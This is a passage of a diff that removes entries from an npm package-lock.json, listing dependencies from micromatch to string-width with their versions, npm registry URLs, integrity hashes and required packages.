"https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "requires": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.0.tgz", - "integrity": "sha512-oGZRv2OT1lO2UF1zUcwdTb3wqUwI0kBGTgt/T7OdSj6M6N5m3o5uPf0AIW6lVxGGoiWUR7e2AwTE+xiwK8WQig==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.3.12", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.3.12.tgz", - "integrity": "sha512-TCNv8vJ+xz4QiqTpfOJA7HvYv+tNIRHKfUWw/q+v2jdgN4ebz+KY9tGx5J4rHP0o84mNP+ApH66HRX8us3Khqg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^2.3.6", - "minimatch": "^9.0.1", - "minipass": "^7.0.4", - "path-scurry": "^1.10.2" - } - }, - "minimatch": { - "version": "9.0.4", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", - "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "rimraf": { - "version": "5.0.5", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.5.tgz", - "integrity": "sha512-CqDakW+hMe/Bz202FPEymy68P+G50RfMQK+Qo5YUqc9SPipvbGjCGKd0RSKEelbsfQuw3g5NZDSrlZZAJurH1A==", - "requires": { - "glob": "^10.3.7" - } - } - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.14", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.14.tgz", - "integrity": "sha512-y10wOWt8yZpqXmOgRo77WaHEmhYQYGNA6y421PKsKYWEK8aW+cqAphborZDhqfyKrbZEN92CN1X2KbafY2s7Yw==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.2.tgz", - "integrity": "sha512-KQZkNU+xn02lWrFu5Vjqg9E81yPtDSxUZorRHlLWVoojD+H/0GFbH59kcnz5Thdjj7c4/mYMBPj/mhvGe/kKXA==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "optionator": { - "version": "0.9.1", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", - "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", - "dev": true, - "peer": true, - "requires": { - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0", - "word-wrap": "^1.2.3" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "requires": { - "callsites": "^3.0.0" - } - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.10.2.tgz", - "integrity": "sha512-7xTavNy5RQXnsjANvVvMkEjvloOinkAjv/Z6Ildz9v2RinZ4SBKTWFOVRbaF8p0vpHnyjV/UwNDdKuUv6M5qcA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.2.2", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.2.tgz", - "integrity": "sha512-9hp3Vp2/hFQUiIwKo8XCeFVnrg8Pk3TYNPIR7tJADKi5YfcF7vEaK7avFHTlSy3kOKYaJQaalfEo6YuXdceBOQ==" - } - } - }, - "path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true - }, - "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "progress": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", - "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", - "dev": true, - "peer": true - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "regexpp": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", - "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", - "dev": true, - "peer": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", - "dev": true, - "peer": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.3.tgz", - "integrity": "sha512-MjOWxM065+WswwnmNONOT+bD1nXzY9Km6u3kzvnx8F8/HXGZdz3T6e6vZJ8Q/RIMUSp/nxqjH3GwvJDy8ijeQQ==" - }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "requires": { - "glob": "^7.1.3" - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "slice-ansi": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", - "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", - "dev": true, - "peer": true, - "requires": { - "ansi-styles": "^4.0.0", - "astral-regex": "^2.0.0", - "is-fullwidth-code-point": "^3.0.0" - } - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "sshpk": { - "version": "1.18.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", - "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": 